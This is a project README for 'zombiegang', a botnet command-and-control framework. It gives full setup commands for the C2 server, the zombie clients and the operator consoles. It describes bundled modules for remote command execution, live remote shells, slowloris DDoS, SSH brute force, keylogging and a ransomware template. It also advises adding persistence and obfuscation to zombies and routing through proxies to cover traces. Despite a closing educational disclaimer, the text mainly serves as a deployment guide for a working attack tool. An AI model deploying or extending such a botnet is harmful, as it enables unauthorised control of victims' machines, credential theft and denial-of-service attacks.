C2 framework with modular and extensible architecture, task scheduler, remote shell live sessions and a retro look-feeling interface which makes it funny to use. By now, it includes keylogger, DDoS and bruteforce attacks.
The extensible botnet framework
Explore the docs Β»
Kickoff
Β·
Report Bug
Β·
Request Feature
Zombiegang is a botnet framework written mostly in Python and PHP. It supports asynchronous communication between cc and zombies, remote-shell live sessions and task scheduler. It also has a plugin manager, which comes with some modules pre-included to perform most typical attacks (DDoS, bruteforce and keylogger). This modular approach allows anyone to extend features by writing his own modules (I will appreciate any contribution).
The Command and Control server is a semi-CRUD API written in php, which manages database read/write operations and authentication. This schema also allows to separate the front-end, which resides entirely in the client used by masters.
Several kind of clients could be used to admin the botnet, and several kind of "zombie-clients" could co-exists too.
This is just a simple way to kickstart all the initial stuff. Obviously, in production environments you can use separate servers for DB and CC, and replace the http server for something like Apache or Nginx.
git clone https://github.com/r3nt0n/zombiegang.git
# step 1 and 2 are optional, only if mariadb not installed yet
sudo apt-get install mariadb-server, mariadb-client
sudo mysql_secure_installation
# change db default password and creates db structure
cd cc-server
nano api/config/data/init.sql
sudo ./initdb
# log into mariadb with the password you just set in init.sql
mariadb -u zgang -p
use zgang;
insert into Masters SET username = '<your-username>', public_key = '<public-key>';
exit
Note: By now, when creating the new row you shouldn't specify any password
, we will create it later. As another note, the public_key
can be an empty string, since PKI logic isn't implemented yet.
Optional: if you want to dump some mocked zombies into db for testing purposes, execute this file:
./dump-testdata
Now you need to start the http server that will act as a proxy, allowing masters and zombies to interact with this db.
When editing database.php
, you must set an IP/hostname pointing to db in $host
, and the password you have just created to access it in $password
(optional, if you changed db name and/or db user defaults, updates $db_name
and $db_user
too).
When editing core.php
, you must change $key
to a random string of your choice. This value is used for JWT tokens encode/decode operations.
cd cc-server
# Edit this file to match your db config
nano api/config/database.php
# and create your own secret-key
nano api/config/core.php
# For testing purposes, you can use the simple http server provided by php
sudo php -S 127.0.0.1:8080
Now you should have the cc-server listening on port 8080 and connected to the database created before.
Note: You can disable masters access logging in core.php
# install zombieclient dependencies
cd zombie-client
pip install -r requirements.txt
# edit config to set cc-server url
nano app/config.py
# to run the zombieclient
python3 run.py
When editing config.py
, you need to set self.credentials['cc_url']
to the URL and path that point to api dir located in your cc-server:
self.credentials = {'cc_url': '<your-url>'}
# example:
self.credentials = {'cc_url': 'http://192.168.1.131/api'}
After run the zombie you should have an output similar to this:
zombie first wake up
Although it may seem like an error, this is expected behavior. Actually, the zombie has successfully created its user but, until we "allow it to enter", he will not be converted to zombie and will not be able to log in with that role into the cc server. We will cover how to accept zombies into the botnet using the master-client.
Zombies will send info about themselves on every boot and check regularly for new tasks, they just keep asking and serving to the cc-server forever (in fact, until you kill this process).
In real scenarios, you will also need persistence, obfuscation and probably compilation (since Python is not available by default on most systems).
# install masterclient (web-client) dependencies
cd master-client
pip install -r requirements.txt
# to run the masterclient (web-client)
./run.sh
Now you should have a Flask app running and listening on port 5000. Browse to http://localhost:5000 and check it. Once inside, you will see something like a desktop. You can enable/disable proxy configuration and login to the botnet with the aproppiate software (proxy.exe
and zgang.exe
).
If you want to cover your trace, use the built-in proxy tool to connect to cc-server through the socks5 proxy of your choice:
proxy configuration example
On this stage you are going to create your master password: with zgang.exe
, create a user with the same name used in your master profile. Now you are logged in as master and can start to admin the botnet.
Note: Mozilla Firefox and Chromium are the recommended browsers, any other could work but won't be officially supported. Some visual features (e.g.: emojis, form elements...) could vary across different browsers.
If you go to zombies section, you can see the new zombie requests to join the botnet that are awaiting your reply and the lists of zombies already joined. Here is where we can accept the zombie created before.
You can schedule tasks and the zombies will receive this info as soon as they go online and refresh his "assignments". If the task was scheduled to be executed in future, the zombie will save this homework and run the task when the start time comes. You also can schedule stop datetimes.
There are special fields in DB which are designed to be nested values, so you can create new fields inside without touching any config (e.g.: Tasks.task_content
,Zombies.sysinfo
)
zombie report example
Additionally, you have a cli client (keeping msfconsole style) to login to cc-server and run remote-shell live sessions with online zombies, you could also connect through a socks5 proxy (like in web-based client) setting PXHOST
and PXPORT
before login
.
# to run the masterclient (cli)
python3 cli.py
simple cli live session example
β οΈ zombiegang is still on development phase, some features wasn't tested under all possible scenarios yet. Any reported bug could be helpful.
From a db point of view, tools and attacks are nothing more than customized tasks. Here is the actual list of customized tasks and subtypes included in the framework:
cmd
: execute remote commands on one or more zombies simultaneoslyrsh
: start remote shell live sessions with one or more zombies simultaneosly (manages delay between zombie's update requests, allowing them to reply immediately, and toggle off at the end of session)dos
: ddos attacks, implemented and working
dos/slowloris
brt
: brute force attacks, implemented, still need some refactor on master-client to create tasks
brt/ssh
rsw
: ransomware attacks, to be implemented (by now, just an example template)By his nature, keylogger module
is an special task and doesn't inherit from the base class Task
. By now, logic to log keypresses and create logs into cc-server
is implemented in zombie-client
(windows and linux systems). To be implemented:
See the open issues for a full list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)For more information, please check the contribution guidelines page.
last development version (available on Github)
zombiegang_0.5.1~beta (27/07/2022)
zombiegang_0.5.0~beta (25/07/2022)
zombiegang_0.1.0~beta (13/02/2021)
r3nt0n: Github - email
zombiegang: Github
This is a personal project, and is created for the sole purpose of security awareness and education, it should not be used against systems that you do not have permission to test/attack. The author is not responsible for misuse or for any damage that you may cause. You agree that you use this software at your own risk. I don't own the rights of any image included, is just a funny tribute to some iconic legends (if you are the owner of any resource and want it to be removed, please contact me and I will do as soon as posible). You can't distribute this app with commercial purposes.
Distributed under the GNU General Public License v3.0. See LICENSE
for more information.